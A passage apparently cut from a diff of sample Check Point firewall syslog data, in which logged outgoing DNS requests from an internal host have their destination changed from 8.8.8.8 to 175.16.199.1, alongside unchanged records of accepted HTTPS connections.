service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48952"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55019"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506180"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43119"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:23:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e784,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"13.48.174.89"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"55426"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34991"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] -<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51267"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37651"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38503"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36417"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34991"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51267"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37651"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38503"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36417"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.49.248.24"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38830"; service:"443"; service_id:"https"; 
src:"192.168.2.2"] <134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.41"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52798"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54491"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36397"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36241"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52168"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37970"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e785,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506181"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54491"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36397"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36241"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52168"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37970"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:23:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.26.6.155"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58950"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58437"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45454"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e786,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506182"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58437"; service:"53"; 
